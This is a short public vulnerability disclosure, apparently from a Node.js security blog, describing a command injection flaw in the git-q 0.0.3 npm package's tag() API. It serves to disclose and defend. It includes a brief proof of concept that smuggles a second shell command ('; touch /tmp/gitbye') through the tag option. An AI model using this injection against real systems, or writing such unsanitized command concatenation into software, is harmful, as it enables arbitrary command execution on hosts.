🦄 Node.js Security

~ 1 min read

Command Injection vulnerability in `git-q@0.0.3`

share on
Publicly disclosing a Command Injection vulnerability in the `git-q` npm package, which allows attackers to execute arbitrary commands on the host system via unsanitized user input.

The git-q npm package describes itself as a thin Q promise wrapper for Git commands. Attempts to contact the maintainer through the GitHub repository through an open issue were unfortunately not successful, and this write-up is the public disclosure of the vulnerability.

Resources:

Background on exploitation

I’m reporting a Command Injection vulnerability in git-q npm package.

This vulnerability manifests with the library’s tag(options) API, which allows user input to specify the tagged version and a commit message. However, this input is passed as-is to the git command and concatenated as the whole command string, making it vulnerable to command injection.

Exploit

  1. Install git-q@0.0.3
  2. Establish the following POC:
var GitQ = require("git-q");
var gitQ = new GitQ();


gitQ
  .tag({ a: "; touch /tmp/gitbye" })
  .done();
  1. Observe new file created on disk at /tmp/gitbye

Node.js Security Newsletter

Subscribe to get everything in and around the Node.js security ecosystem, direct to your inbox.

    JavaScript & web security insights, latest security vulnerabilities, hands-on secure code insights, npm ecosystem incidents, Node.js runtime feature updates, Bun and Deno runtime updates, secure coding best practices, malware, malicious packages, and more.

    Built with ConvertKit